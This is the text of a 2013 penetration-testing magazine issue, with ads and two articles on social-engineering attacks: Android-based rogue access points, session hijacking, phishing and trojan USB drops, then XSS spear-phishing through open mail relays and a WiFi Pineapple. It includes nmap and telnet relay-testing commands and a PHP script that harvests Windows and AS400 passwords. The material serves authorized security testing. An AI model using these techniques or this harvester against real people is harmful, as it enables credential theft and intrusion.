PenTest Mag - 2013 May

Cyber Security Auditing Software
www.titania.com
Improve your
Firewall Auditing
As a penetration tester you have to be an expert in multiple
technologies. Typically you are auditing systems installed and
maintained by experienced people, often protective of their own
methods and technologies. On any particular assessment testers may
have to perform an analysis of Windows systems, UNIX systems, web
applications, databases, wireless networking and a variety of network
protocols and frewall devices. Any security issues identifed within
those technologies will then have to be explained in a way that both
management and system maintainers can understand.
he network scanning phase of a
penetration assessment will quickly
identify a number of security
weaknesses and services running on the
scanned systems. This enables a tester to
quickly focus on potentially vulnerable
systems and services using a variety of tools
that are designed to probe and examine
them in more detail e.g. web service query
tools. However this is only part of the picture
and a more thorough analysis of most
systems will involve having administrative
access in order to examine in detail how
they have been configured. In the case of
firewalls, switches, routers and other
infrastructure devices this could mean
manually reviewing the configuration files
saved from a wide variety of devices.
Although various tools exist that can
examine some elements of a configuration,
the assessment would typically end up
being a largely manual process. Nipper
Studio is a tool that enables penetration
testers, and non-security professionals, to
quickly perform a detailed analysis of
network infrastructure devices. Nipper
Studio does this by examining the actual
configuration of the device, enabling a much
more comprehensive and precise audit than
a scanner could ever achieve.
www.titania.com
Ian has been working with leading global
organizations and government agencies to
help improve computer security for more
than a decade.
He has been accredited by CESG for his security and
team leading expertise for over 5 years. In 2009 Ian
Whiting founded Titania with the aim of producing
security auditing software products that can be used by
non-security specialists and provide the detailed
analysis that traditionally only an experienced
penetration tester could achieve. Today Titania’s
products are used in over 40 countries by government
and military agencies, financial institutions,
telecommunications companies, national infrastructure
organizations and auditing companies, to help them
secure critical systems.
With Nipper Studio penetration testers can be experts in
every device that the software supports, giving them the
ability to identify device, version and configuration
specific issues without having to manually reference
multiple sources of information. With support for around
100 firewalls, routers, switches and other infrastructure
devices, you can speed up the audit process without
compromising the detail.
You can customize the audit policy for your customer’s
specific requirements (e.g. password policy), audit the
device to that policy and then create the report detailing
the issues identified. The reports can include device
specific mitigation actions and be customized with your
own companies styling. Each report can then be saved
in a variety of formats for management of the issues.
Why not see for yourself, evaluate for
free at titania.com

Page 4 http://pentestmag.com OPEN 05/2013
Editor in Chief: Ewa Duranc
[email protected]
Managing Editor:
Ewa Duranc
[email protected]
Zbigniew Fiolna
[email protected]
Editorial Advisory Board: Larry Karisny, Amit Chugh, Jeff
Weaver, Arnoud Tijssen, Varun Nair, Horace Parks, Jr.
Proofreaders
Ewa Duranc, Patrycja Przybyłowicz, Gavin Inns, Larry Karisny
Special Thanks to the Beta testers and Proofreaders who helped
us with this issue. Without their assistance there would not be a
PenTest magazine.
Senior Consultant/Publisher: Paweł Marciniak
CEO: Ewa Dudzic
[email protected]
Art Director: Ireneusz Pogroszewski
[email protected]
DTP: Ireneusz Pogroszewski
Production Director: Andrzej Kuca
[email protected]
Publisher: Hakin9 Media
02-682 Warszawa, ul. Bokserska 1
Phone: 1 917 338 3631
www.pentestmag.com
Whilst every effort has been made to ensure the high quality of
the magazine, the editors make no warranty, express or implied,
concerning the results of content usage.
All trade marks presented in the magazine were used only for
informative purposes.
All rights to trade marks presented in the magazine are
reserved by the companies which own them.
DISCLAIMER!
The techniques described in our articles may only
be used in private, local networks. The editors
hold no responsibility for misuse of the presented
techniques or consequent data loss.
Dear PenTest Readers,
We have entered a new month. Therefore, it is high time we summarized
May. As usual, in order to provide you with a detailed summary of what
we did and what will be done this month, we have prepared PenTest
Open – our regular line of PenTest Magazine which is available for free.
We have chosen several articles for this issue, the majority of them
has not been published yet, so it’s a great chance to take a look at our in-
coming issues on Smartphone Pentesting, ICS for Pentesters and Starter
Kit. Thus, you wil learn what your smartphone is capable of!
What is more, in this month’s PenTest Open you have a chance to
read two articles selected from the newest ebook on Cybersecurity by
William F. Slater, III. Equipped with this knowledge, you will be able to
protect not only yourself, but also your company and the whole world
from cyber attacks. Cybersecurity, cyberwarfare and cyberdeterrence
generate a great deal of heated debate nowadays and that is why we
wanted to provide you with this valuable souce of Information.
Enjoy your reading!
Ewa Duranc & PenTest Team
Page 5 http://pentestmag.com OPEN 05/2013
PENTESTING TRICKS
06
Social Engineering and Phishing
Attacks Using Android Device
By Domagoj Vrataric
Picture this: you are involved in penetration testing of a
serious client, a bank or telecommunication company.
Besides usual testing of corporate network and Web ap-
plications, it is very important to make sure that all em-
ployees are introduced to risk of social engineering and
phishing attacks.
14
Using XSS in a Spear-Phishing Attack
By Carlos A. Lozano
When a client asks for a social engineering tests, most
part of security consultants try to perform a phishing.
However, there is a lot of other possibilities to get better
results without complexity. By reading this article you will
learn how to mix simple techniques with malicious ones
to evaluate security controls where people are involved.
20
Wireless Penetration Testing: Beyond
the IEEE 802.11 Family of Standards
By Francesco Perna
The wireless penetration testing covers a large family of
wireless protocols. Usually the penetration testing com-
panies offer to their Customer only WiFI (IEEE 802.11 fam-
ily of standards) penetration test, leaving out the others
widespread wireless technologies.
CASE STUDIES
26
Hacking a Bank
By Andrei Bozeanu
A couple of years ago, I was contacted by a major commer-
cial bank in my country to conduct a series of Blackbox
penetration tests against their external network, recently
after they acquired a very costly Information Security Man-
agement System from a major international audit firm.
28
Do No Harm
By Jack Jones
There is no question that penetration testing, done well,
can be incredibly valuable in helping executives make well-
informed decisions to better manage their company’s risk
landscape. A pentest, however, can be worse than useless
if it results in wasted resources and unnecessary business
impact. The difference often hinges on the critical thinking
you apply when interpreting test results.
WAR CAMP
32
Applying a Security Compliance
Framework to Prepare Your Organiza
tion for Cyberwarfare and Cyberattacks
By William F. Slater, III
One of the main disadvantages of the hyper-connect-
ed world of the 21st century is the very real danger that
countries, organizations, and people who use networks
computer resources connected to the Internet face be-
cause they are at risk of cyberattacks.
46
Integration of Cyberwarfare and
Cyberdeterrence Strategies into the
U.S. CONOPS Plan to Maximize
Responsible Control and Effectiveness
by the U. S. National Command
Authorities
By William F. Slater, III
This paper deals with issues related to the present situ-
ation of lack of a clearly defined national policy on the
use of cyberweapons and cyberdeterrence, as well as
the urgent present need to include strategies and tactics
for cyberwarfare and cyberdeterrence into the national
CONOPS Plan, which is the national strategic war plan
for the United States.
LET’S TALK ABOUT SECURITY
59
SECUCON 2013 Conference Summary
By PenTest Team
SECUCON 2013 – A conference hosted by SECUGENIUS
– A unit of HARKSH Technologies Pvt Ltd at GGNIMT,
Ludhiana with a vision to create awareness for the need
of SECURITIES in social living and to spread a message
of generating opportunities in the same field. The article
covers a short summary of the event.
60
Smartphone a win-win product for both
consumers and sellers
By Rajiv Ranjan
Nowadays, Smartphones are the basic part of life for every
corporate employee. They use smartphone devices to gain
access to the companies credential and to check company
specific mails and data. Thus security remains a big con-
cern at the workplace. So penetration testing needs to be
done at every available aspect whenever it is possible.
INTERVIEW
64
Interview with Ian Whiting, CEO of Tita-
nia Company
By PenTest Team
PRODUCT REVIEW
68
Titania’s Paws Studio Review
By Jim Halfpenny
CONTENTS
PENTESTING TRICKS
6 http://pentestmag.com Page OPEN 05/2013
I
n my opinion, every professional penetration
testing should have social engineering and
phishing attacks implemented as obligatory
part of penetration testing solution offered to your
clients. That is what makes the difference between
good and better service. Imagine that you are giv-
en the assignment by CSO of Company X to test
their employees to social component in malicious
attacks. And now what ? Human weakness fac-
tor is easier to exploit than network security. You
can have safest firewalls and VPN's, but in the end
if you have a security senseless employees, you
have potential problem. The idea is to make se-
curity assessment using Android device and ap-
plications, to be less suspicious it's good idea to
use tablet or smartphone, not a laptop. The article
describes the tools, techniques, strategy, prepara-
tion and the realization of such attacks. Complete
Scenario section of article is fictional, does not re-
flect real situation in the wild. Idea is to bring closer
thinking of performing penetration testing with mo-
bile devices, in this case – Android tablet. It is very
hard to perform attack like one described in this ar-
ticle, but on the other side, it is not impossible, and
in general, there is a real threat to companies from
attacks using social engineering and weakness in
human psychology. And remember, focus of this
article is to show penetration testers in which ways
they could conduct penetration testing, and not to
make universal way to test any corporation, bigger
or smaller.
Platform and Tools
In my previous article I wrote about modified An-
droid OS and few Android applications for pene-
tration testing, including dSploit, penetration test-
ing application with plenty of options for Man in
The Middle (MITM) attacks. This Android pene-
tration suite can help you while you're perform-
ing social engineering tricks. dSploit (see Figure
1) has an option to disconnect clients from wire-
less network, thus it's buying time for further im-
provisation. It also has ability to redirect clients to
the specific website, so you'll have additional help
for phising attack. The core of this application are
features from nmap, iptables,tcpdump, ettercap
and hydra. With Android PCAP Capture, which is
essentially Kismet for Android, you're able to get
more detailed informations, such as list of clients
connected to accessible network, their MAC ad-
dress, and other useful informations. The thing is,
application doesn't work without external wireless
card, on their official Web site is list of supported
Android devices and USB cards which works with-
out problems. For using of this application out-of-
the-box, you'll need OTG USB adapter or cable,
Picture this, you're involved in penetration testing of serious client,
a bank or telecommunication company. Besides usual testing
of corporate network and Web applications, it's very important
to make sure that all employees are introduced to risk of social
engineering and phishing attacks. In this article I will show how
is possible to make such attacks with Android device and a few
applications.
Social Engineering
and Phishing Attacks Using Android Device
wireless USB card with RTL8187 chipset, Android
4.0 or higher and support for USB host mode on
your Android device. For phishing attacks, kWS
– Android Web Server can help you with serving
cloned Web sites. Wireless Mac Changer is used
to change MAC address of your wireless adapter,
so we could pretend to be wireless access point
from specific vendor, and thus sniff network traf-
fic. Besides that, there are standard Man in The
Middle applications such as: DroidSheep, (see
Figure 2) Droidsniff andDroidsteal, which are
Figure 2. DroidSheep – hijacking features Figure 1. dSploit – MiTM options in suite
a d v e r i s e m e n t
PENTESTING TRICKS
8 http://pentestmag.com Page OPEN 05/2013
essentially the same application with features
for capturing accounts (Facebook, Gmail, Twit-
ter and similar Web services) when you're con-
nected to wireless network. If you have special
needs for applications such as Social engineering
toolkit (SET), Metasploit or Aircrack-ng, you can
install Kali Linux on your device with Complete
Linux Installer (see Figure 3). For easier control
of distribution, you can enable and configure VNC
or SSH server on local device. By installing Kali
you're getting full feature penetration testing dis-
tribution on your mobile device. Installation is very
simple and it's done in few steps, first you need
to download archive with image from official Web
site of Complete Linux Installer. After download-
ing, extract archive to /sdcard/kalidirectory, add
widget to tablet workspace and choose image file
to load. Great feature of Kali is multi platform sup-
port, which also includes ARM architecture, usu-
ally running on Android devices (see Figure 4).
Device used in this example is Nexus 7 GSM with
32 GB of storage, and to use Kali Linux, you will
need at least 4 GB of free space on device.
Strategy
At the very beginning, you need to develop a strat-
egy for attack. If you're performing “white box” pen-
etration testing, you'll probably have access to in-
ternal network. If you're lucky, organization has
wireless network, and if you want to gain unauthor-
ized access to it, try with social engineering. Know
your target and inform yourself about it, the more
informations you possess, the bigger is chance to
succeed, information gathering and target research
are crucial steps while performing social engineer-
ing. You could introduce yourself as someone who
is highly ranked in target company, that fact will
give you some credibility. To gain trust you can tell
that you've come for a meeting with IT manager,
or simple that you're someone from another divi-
sion of the same organization who is in hurry or
need help to connect to wireless network. If you
are trying to get passwords from employees, play
on “empathy card” and you'll have more chances
to succeed, in human psychology there is a deep-
seated need to help others in trouble. If a company
has vendor specific equipment you could introduce
yourself as vendor technician, and to look convinc-
ingly get some t-shirt with vendor logo and name.
If you can't get access to the wireless network as
described above, try to make rogue wireless ac-
cess point, in the other words, your own wireless
network from where you can start sniffing network
traffic, including hijacking sessions and using them
with built-in browser. The attack with rogue access
point is quite interesting way to obtain information
you need. If the victim uses a wireless network and
if it's located far from the access point, you can
get close up to victim with your rogue access point
(Android device). Your wireless beacon will have
Figure 5. Scrapbook – options overview
Figure 3. Complete Linux Installer – loading image
Figure 4. Running Kali on Android
9 http://pentestmag.com Page OPEN 05/2013
stronger signal than the actual access point, and
victim wireless card will probably connect to your
device. It's a good idea to change MAC address
of your wireless card on tablet or smartphone to
address of nearest access point with the best sig-
nal so it looks more convincing, same SSID, same
MAC address. There is one important detail with
raising rouge access point. If company has a wire-
less network, it is probably encrypted, but remem-
ber that when raising rouge access point, don't
setup any encryption, so victim's laptop will au-
tomatically connect to rouge access point. Every
big IT organization has its own information system
which probably has some kind of internal Web ap-
plication with login page, perhaps a CMS or web-
mail application. There are several ways to make
a phishing Web site, one of them is to use Scrap-
book, a Firefox add-on which has many options for
saving Web pages (see Figure 5). Unfortunately,
this plugin doesn't work on Firefox for Android on
my device (Nexus 7) so I cloned website on desk-
top machine, and later transfer it to Android device.
Now, when we have cloned Web page ready for
phishing, we have to figure out a way to lure em-
ployees into our trap. One more thing you could
do is installing trojan horse or password stealer on
USB stick and leave the stick somewhere on the
floor, so it looks like someone dropped it. Curious
employee will pick up the stick and connect it into
his PC or laptop to see the content on them. Chose
place where you can be sure that someone will
see it, not under desk, rather on place where peo-
ple gather at pause break or a place where people
naturally put things down, such as space around
coffee machine.
Preparation
Before you start with social engineering, it is wise
decision to inform yourself about the target com-
pany before entering company area. That is most
important thing in every type of penetration test-
ing. Try to gather as much informations you can
about employees, does they use some special
phrases in their everyday communication, when is
launch break, small hint: empty workspace in time
of lunch, ideal time to explore area in search for
valuable informations. Small things counts as most
important in social engineering, they could make
or break penetration test. Inform yourself which
operating system does employees use, and thus
you will have lesser testing scope in later testing.
A great tool for information gathering about a spe-
cific person is recon-ng (see Figure 6), it is similar
to Metasploit and SET (Social Engineering Tool-
kit, but intended for information gathering, with
many modules specially dedicated to find informa-
tions about employees, from auxiliary, contacts to
pwnedlist – module used to “determine if email ad-
dresses are associated with leaked credentials”.
You can stalk people via Twitter module to get to
know them better and find out what things they
like to be able to more easily develop communi-
cation and extract information we want from them.
LinkedIn and Jigsaw are also supported with this
tool. Another thing you could do is to create stick-
ers with QR codes on them, that lead to malicious
URL, SET has option to generate QR code and as-
sist with that type of attack. For this type of attack
you'll need to be patient for a while, a few days, just
to be sure that enough number of employees no-
ticed the QR code and depending on their curiosity
and knowledge about QR codes, did or didn't scan
QR. A good example would be to create a simple
script that will record which employees scan the
QR code, that redirected them to the script. Re-
member, you are trying to test employees, not to
harm them in any way, and that includes install-
ing malicious applications on their devices. Make
good preparation for attack before you start it.
Figure 7. kWS Web server
Figure 6. Recon-ng – list of basic commands
PENTESTING TRICKS
10 http://pentestmag.com Page OPEN 05/2013
Launching The Attack
So, now when you have both tools and strategy,
you can start off another side of penetration test-
ing, social engineering. Enter into organization
area with self-confidence, so that no one would
ever suspect that you came to test them, don't be
too suspicious with you behavior. There is always
someone at the entrance to the working area in
organization. Introduce yourself as new network
technical who received a call about problem with
wireless network and ask for permission to test
current wireless network. That is “pretexting”, the
act of creating an invented scenario to persuade
a targeted victim to release information or per-
form some action. Raise rogue access point on
Android device and persuade someone to help
you while you're testing network issues by con-
necting to it and surfing, so you can check if cor-
porate network and Internet are both working. In
background, run dSploit and start sniffing traf-
fic and hijacking sessions. Later, you could ana-
lyze .pcap file with Shark Reader or with Wire-
shark on laptop or PC. Leave dSploit sniffing in
the background and run DroidSheep to capture
sessions for Webmail, CMS or something simi-
lar which could be useful to malicious attack-
er. DroidSheep has a couple of helpful options
to help you manage to capture user sessions,
such as option to save cookies or export them
via email and add host to blacklist. Tell employee
you're told that the most of Web services such
as Webmail doesn't work, so both of you need
to check them while you're capturing all network
traffic with sessions. Next thing you could do is to
clone targeted Web site to your Android device,
run Web server and lure employee to visit phish-
ing site after you “fixed” a problem with wireless
network. Setup your /etc/hosts file on Android de-
vice, for example, on line should look like this:
127.0.0.1 webmail.companyx.com. So, when vic-
tim open specific URL such as above URL for cor-
porate Webmail, while they are connected to you
software access point on your device, you will re-
direct them to your cloned version of Webmail.
The trick with phishing attack is that after victim
tries to log-in into Webmail, a script will save cre-
dentials into text file, throw an error about wrong
password, and redirect victim to real corpo-
rate Webmail. With little luck, penetration tester
should easily obtain password (see Figure 7).
Figure 11. Running SSHDroid
Figure 10. SET running inside Kali on Android
Figure 9. SET – generating malicious QR code
Figure 8. Wireless MAC changer – simple interface
11 http://pentestmag.com Page OPEN 05/2013
Scenario
Company X is corporation with more than 300
employees, which gives Peter big chance to suc-
ceed in attack. Peter is penetration tester who
works in a security company, and was commis-
sioned to test the company Company X's employ-
ees on social engineering attacks. With recon-
ng he manage to find out who are key people in
company, in case he needed to cover up, he will
know which person to mention to gain trust. He
also discover which sectors does company have,
and make sorted list of people which he previ-
ously put together, by the sector. That gave him
good background. Before attack, he scanned
wireless networks around the company building,
and what he saw is that corporate wireless ac-
cess points had first three column MAC address
of vendor specific network equipment. So armed
with this information, he decided to change MAC
address and SSID of his wireless network card
on tablet. With Wireless Mac Changer (see Fig-
ure 8) that was piece of cake. On the entrance
he met doorman who's checking documents, em-
ployees had ID cards hanging from their neck, so
they could enter without doorman checking them.
He introduced as network support, wearing ven-
dor t-shirt, which he got on E-bay, and noticed
that hes received call from company's CTO to fix
or replace broken network device, which enables
Internet link. Doorman let Peter inside office ar-
ea, knowing that it's necessary for them to have
Internet working. Peter drops few different USB
sticks around the office, one in toilet, one next to
coffee machine, and two on random office desks.
While he was on way to coffee machine, he paste
QR code to the wall next to machine, previously
generated with Social engineering toolkit (SET)
(see Figure 9, 10), so while waiting for coffee,
people will surely notice that QR code, and if he's
lucky, scan it. Peter left his tablet on the one of-
fice desk and turned on software wireless access
point, connect it to the charger so he will solve
two things with this move, battery will not drawn
and it will be less suspicious if somebody see tab-
let connected to charger, because it's logical that
employees charge their devices when they are
empty. To lure people into connecting on his tablet
he told few employees that he made backup solu-
tion for wireless, as network technician, while he
launched deauthentication attack with aircrack-ng
to proove them that corporate wireless network is
not working as it should work. After that, clients
start disconnecting from corporate wireless and
start connecting on his “backup wireless” SSID,
he run DroidSheep, a tool for man in the middle
attack, set up fake phishing corporate Webmail
for those who connect to his access point, and
also traffic sniffer for Android – Shark. He turned
QR codes
Wireless Mac Changer on Google Play
Complete Linux Installer on Google Play
Android PCAP Capture – Google Play
kWS – Android Web Server on Google Play
Shark for Root on Google Play
SSHDroid on Google Play
DroidSheep: http://forum.xda-developers.
com/showthread.php?t=1593990
dSploit: http://cloud.github.com/downlo-
ads/evilsocket/dsploit/dSploit-1.0.31b.apk
PENTESTING TRICKS
12 http://pentestmag.com Page OPEN 05/2013
on kWS – Android Web Server and start hosting
phishing sites. Now, he will have spying device
inside company, without suspicious look from the
employees. He installed the SSH server to his de-
vice so he could easily have access to Kali Linux
from outside world, and run various attacks (see
Figure 11). After few days, Peter manage to col-
lect dozens of accounts trough phishing Web
sites he cloned from original ones and trough
Man in The Middle attack with Droidsheep. Also,
few employees became victim of malicious QR
codes and trojan horse dropper from USB sticks
which infected their devices. After this demon-
stration about social engineering, managers from
Company X realized that education of employees
on social engineering attacks is essential part of
education on IT security.
Summary
In this article I have tried to inspire and encourage
readers to engage their imagination while they are
planning their next penetration testing. Today, we're
living in the era when managers invest into hard-
ware and software protection, from firewalls to IPS/
IDS, but weakest link in an organization are still se-
curity uneducated employees. It isn't hard to ex-
ploit employees who don't know much about such
attacks and protection from them. You don't need
to have much experience with social engineering
to conduct above described attacks with mobile de-
vices, for example tablets are widely used in orga-
On the Web
http://ctrlaltnarwhal.wordpress.com/2012/10/29/173/ – “Phishing Using Only a Android Phone”,
https://www.os3.nl/_media/2009-2010/students/laurens_bruinsma/ssnproject_android_v1.0.pdf – “Compromising WiFi
Security with Android”,
http://www.kismetwireless.net/android-pcap/ – “Kismet (for Android)” documentation.
http://www.social-engineer.org/framework/Pretexting_Defned – “Pretexting Defned”
https://afreak.ca/blog/social-engineering-using-qr-codes/ – “Social engineering using QR codes”
http://www.csoonline.com/article/479038/social-engineering-anatomy-of-a-hack – “Social Engineering: Anatomy of a
Hack”
http://hackaday.com/2011/10/04/wif-jamming-via-deauthentication-packets/ – “WiFi jamming via deauthentication
packets”
Glossary
Android
Social engineering
Phishing
dSploit
Kali
Pentest
Recon-ng
Complete Linux Installer
Social engineering toolkit (SET)
DroidSheep
nizations, so when you see somebody using tab-
let or smartphone, it's common and everyday stuff.
The thing is that nobody will suspect you're hold-
ing hacking device in your hands. Devices for above
described attacks, are tablet Nexus 7 and Nexus S,
a mobile phone. Nexus 7 isn't expensive and it has
sufficient resolution for comfortable work, 1280×800
WXGA pixels, quad-core ARM Cortex-A9 CPU, and
Nexus S could be a good backup device if some-
thing doesn't work as planned.
DOMAGOJ VRATARIC
Domagoj Vrataric is IT Security Man-
ager at Aduro Ideja Ltd., a company
from Croatia who ofer software so-
lutions for telecom industry, high vol-
ume data processing, real-time sys-
tems, penetration testing services and
mobile application security. He has ex-
perience with penetration testing (OWASP methodolo-
gy), mostly in telecommunication industry, eCommerce
(osCommerce, ZenCart, OpenCart) and media indus-
try. 10 years experience with Linux, 8 with IT security,
knowledge about hackers culture and way of thinking.
He is currently involved in penetration testing and proj-
ect manager on several security projects. Additionally in
charge of security in Aduro Ideja, from monitoring IT in-
frastructure, administration of Debian servers, securi-
ty policies on computers and mobile phones, to Android
reverse engineering.
Cyber attacks are on the rise.
So, you think your systems
and networks are secure?
Think again – you’ve already been attacked and compromised.

And, we should know because we did it in less than four hours. Here’s the good news:
we’re the good guys. We can tell you what we did and how we did it, so you’ll be
prepared when the bad guys try it – and they will. We’ll show you how.


Visit www.KnowledgeCG.com to learn how KCG’s experienced, certifed cybersecurity
professionals help our government and commercial customers protect their
cybersecurity programs by knowing the threat from the inside out.
4 Combat cyber attacks 4 Ensure resilience
4 Mitigate risk 4 Improve operational efficiency
Trusted Cyber Advi sor
PENTESTING TRICKS
14 http://pentestmag.com Page OPEN 05/2013
Using XSS in a
Spear-Phishing Attack
When a client asks for a social engineering tests, most part of
security consultants try to perform a phishing. However, there is a
lot of other possibilities to get better results without complexity.
N
owadays, it is very common for the compa-
nies to use security services that include
social engineering and physical security
evaluations. Sometimes, as a part of an integral
analysis or only as unitary tests to accomplish with
corporate or government requirements.
However, the concept of social engineering is
very broad. Formally, it refers to the practice of
getting confidential information through legitimate
user manipulation. Likewise when we think about
social engineering the first thing to come into our
minds are Kevin Mitnick’s stories where he’s com-
promising information systems leveraging human
weaknesses.
From here we can conclude that the real purpose
of social engineering evaluations is analyzing the
corporate process consistency. For example, analyz-
ing a financial information consulting process where
no employee is allowed to offer sensitive information
without a lot of identity validations controls.
At the same time at the beginning I mentioned
the physical security evaluations because I believe
that both the physical security and the social en-
gineering are tightly related due to the fact that by
getting sensitive information mal-intentioned users
can perform physical security control violations.
The complexity and the number of companies’
processes, which are directly proportional to the
companies’ size reminds us of endless possibili-
ties to analyze the reliability of the security con-
trols implemented. The main idea for this article
is to demonstrate some kind of attacks I conduct-
ed on companies as part of security evaluations,
showing the vulnerabilities that allowed successful
attacks, as well as possible implications and cor-
rections. Those last needs to be analyzed by each
company due to the fact that the security controls
to implement will differ because of company size,
business focus, resources, internal politics, etc.
Conducting a Phishing Attack
I have found that XSS is common, especially be-
cause the majority of penetration testers show
in their reports pop-ups from a JavaScript such
like this one: <script>alert(“Hello world!”)</
script>; Although it is true that this is evidence of
the vulnerability, a really mal-intentioned user will
not limit his attack to the pop-up, he will exploit the
simple vulnerability to get more benefits.
What follows is the most common, easy and very
effective scenario to exploit a XSS.
This test mix different vulnerabilities and infor-
mation obtained in the scouting phase to exploit a
XSS with a lot of effectiveness.
First, we need to send the XSS to the application
users. There is a lot of ways, but the most common
15 http://pentestmag.com Page OPEN 05/2013
is sending e-mails. We can try to send an e-mail
of the corporate format from public address using
Gmail, Outlook, etc, but that will reduce the effec-
tiveness to zero. Also there are anonymous e-mail
senders, but the most part of these public services
is banned by the e-mail servers, so our e-mails will
be detected by the company.
The best way to send e-mails effectively is us-
ing open relays of the companies’ servers directly.
It is very common that companies have a lot of e-
mail servers on UNIX platforms which aren’t con-
figured, merely executing because of bad or de-
fault configurations.
First of all you need to detect the mail servers. To
do so you can use the following command:
nmap -vv -sV -P0 –p25 [range of IP]
After that you need to verify the open relay in
each mail server, with the purpose to check if it is
possible to use it for sending our XSS attack pay-
load. You can use Telnet to test each server:
>helo domain.com
from: [email protected]
rcpt to: [email protected]
subject: Test
Data
Hello world!
.
If we’re skilled developers we can write and script
to perform this verifcation automatically for each
mail server detected by Nmap.
Once we have verified the mail server permits
send anonymous e-mails, we can use them to
send our XSS attack using the corporate image to
an only a reduced number of users.
Why a reduced number of users and not to all the
employees? Because if we send a lot of e-mail is
more possible that someone call to security office
to validate the information. If you send an e-mail to
specific targets is most effectiveness and gener-
ates less noise into the company.
While it is known by a lot of people that manag-
ers and directors are the most vulnerable targets
because of their poor knowledge of IT sector, my
recommendation is to abstain to select those kind
of people at the first time, and only do so if it is the
only way to perform an attack. It is because usu-
ally this group of people have more influence into
the internal security processes, and a warning by
them has faster impact than warnings by others.
After that, all warnings will be attended by the IT
or security department, so in this kind of attacks
speed is very important.
Now we can use a web server installed and con-
figured by us to exploit the XSS vulnerability or
directly inject a frame into the web application. It
depends on attacker’s imagination and skills. Re-
member that this is an authorized evaluation, and
for our client would be important not only to log ac-
cess credentials in our attack, also it is important to
save timestamps in each event, for example when
the users read the e-mail, when access to the fake
website took place, when entering information and
when leaving from our fake website.
Using this information we can evaluate the time
taken by users, IT and security areas to manage
the incident.
The reason for this kind of attack being success-
ful, in spite of its simplicity, is the trusted behavior.
In the first instance, the victim reads the corporate
domain address of the e-mail sent by the attacker
which can be considered to be very trusted and if
the user follows the link attached into the e-mail
and notices a copy of the corporate website the
trust increases.
As a curious fact, in penetration tests, where I
performed this kind of attack, the kind of people
who detected attacks where assistants, which are
skilled people who can detect differences between
previous e-mails and the malicious one. Actually a
lot of attacks were detected because of misspell-
ings (Figure 1).
Attacking From a Cafeteria
I declare myself a fan of Hak5, and for me some
of their devices are great. One of the most versa-
Figure 1. The most common XSS exploitation
PENTESTING TRICKS
16 http://pentestmag.com Page OPEN 05/2013
tile devices is the WiFi Pineapple (http://hakshop.
myshopify.com/products/WiFi-pineapple). Thanks
to using this device it is possible to perform social
engineering attacks.
The WiFi pineapple is a small device modified
with an installation of OpenWRT, which a Linux
distribution oriented towards little network devices.
And Jassager, an interface that permits to interact
with the WiFi Pineapple. In its most simple attack,
the Pineapple has an option called “Karma” which
accepts all the request generated by the near de-
vices, when they are looking for their preferred net-
works. The WiFi Pineapple always accepts these
connections, and we have the option to redirect
the traffic intercepted with the Pineapple to an-
other networks, for example the Internet or an In-
tranet, if you’re testing an internal network.
With the WiFi Pineapple we have an option to
perform DNS spoofing attacks. We can redirect
websites visited by the users to fake websites
mounted by us. So we can copy the index from any
internal or external website and put into our web
server, inclusive into the WiFi Pineapple’s web-
server, modify the HTML code and use the fields
to save users and passwords. After saving impor-
tant information we can then redirect the user to
the real site and start a session for the attack to be
transparent to the user.
At the Pineapples’ wiki you can get common-
ly used pages like Facebook, Gmail, Yahoo, etc.
which can be used to catch users from these pub-
lic services or you can use a personalized page,
depending on your requirements.
What follows is a snippet of code shown in List-
ing 1, you can use to catch users, passwords or
whatever you want.
This simple code was used in a real example
mixed with the WiFi Pineapple against an internal
application. Using this code we cached more than
100 Windows domain and mainframe accounts.
Also the characteristic of the WiFi Pineapple per-
mitted that it wasn’t required for the attack to be
performed from company facilities. Perfoming it
from a cafeteria located at side was enough. This
avoids the complicated physical access.
That code doesn’t use a DBSM or sophisticated
modules, even it can be saved into the WiFi Pine-
apple’s webserver and then the attacker can ac-
cess by SSH to review the information captured.
I have to say that the complexly around the at-
tack is not the important thing here, opposite, the
important thing here is the easiness with a mal in-
tentioned user can access to sensitive information
and resources in a network without complex task
as exploit execution, ARP poisoning or another
other resource.
Other important feature of the WiFi Pineapple is
the use of rechargeable batteries, so an attacker
can put inside a company a Pineapple to catch in-
formation forgetting it for some hours. It would be
very complicated to locate.
Unauthorized Access
As I said at the beginning, physical security and
social engineering tests are close related. Below
I will describe some examples in which is mixed
social engineering attacks to get physical access
to facilities with the purpose of extract information,
laptops and devices or only to review security con-
trols implemented by the company.
Figure 2. WiFi Pineapple
Figure 3. Basic MITM using a WiFi Pineapple
17 http://pentestmag.com Page OPEN 05/2013
Usually the first security control is the identifica-
tion of a person to get access to facilities, is com-
mon the use of PVC credentials with the employee
photograph, name, charge, etc.
These credentials can be printed in a stationery
with a proximally cost of $1.5 dollars per creden-
tial. We can print the information we want, and can
show as a valid credential with our data in the se-
curity control as an authorized person.
In my experience, even with this kind of creden-
tials, can be complicated access to unauthorized
areas, mainly when we want access to principal
facilities, however small facilities or branches
are easier.
For example, during an evaluation a client ask
me for determine the complexly level to access
to a bank facilities. After studied the bank, I de-
termined access to main facilities was very, very
complex.
First security control was a policeman at the
door, to access to the bank I needed present a
credential and write my personal information and
the serial number of my laptop. This control should
be passed by employees and guests, after that I
needed to wait for a personal who sign my access,
writing the visit purpose; el guest needed to be es-
corted by an employee, even if you wanted visit
the bathroom. Try to impersonate an employee will
be failed because of biometric access control for
open the doors.
There are techniques to avoid this kind of con-
trols, like pass the doors closed to other person,
pretend be an office boy, etc. but if you tried to
perform this kind of techniques you know is not
very easy.
After my analysis, I determined that access to
main facilities was impossible, however during a
tour with the CSO I saw a branch office, and in
Listing 1. Getting passwords
<< Getting passwords>>
<?php

if(isset($_POST[‘Enviar’])) {
if( isset( $_POST[‘windows’] ) ) {
$membresia = $_POST[‘windows’];
}
if(isset($_POST[‘windows_contra’])) {
$tarjeta = $_POST[‘windows_contra’];
}
if (isset($_POST[‘as400’])){
$tipo=$_POST[‘as400’];
}
if(isset($_POST[‘as400_contra’])) {
$cvv = $_POST[‘as400_contra’];
}
$fp = fopen(“pwds.txt”, “a”);
if($fp) {
$cadena = $windows . “:” . $windows_contra. “:” . $as400.”:”.$as400_contra.”\r\n”;
fwrite($fp, $cadena);
fclose($fp);
}
?>
<script>
alert(‘Ocurrio un error en la transaccion\nIntentelo mas tarde’)
</script>
<META HTTP-EQUIV=”REFRESH” CONTENT=”1;URL=http://www.client.com>
<?php
}
PENTESTING TRICKS
18 http://pentestmag.com Page OPEN 05/2013
each branch office there are servers to commu-
nicate local financial operations to the main serv-
ers. The physical security controls at branch offic-
es were poor; the CSO only presented a business
card to the manager, said “Hi, I’m the CSO and I
member of the directors board”, presented his cre-
dential and the manager officer all kind of support
to his work.
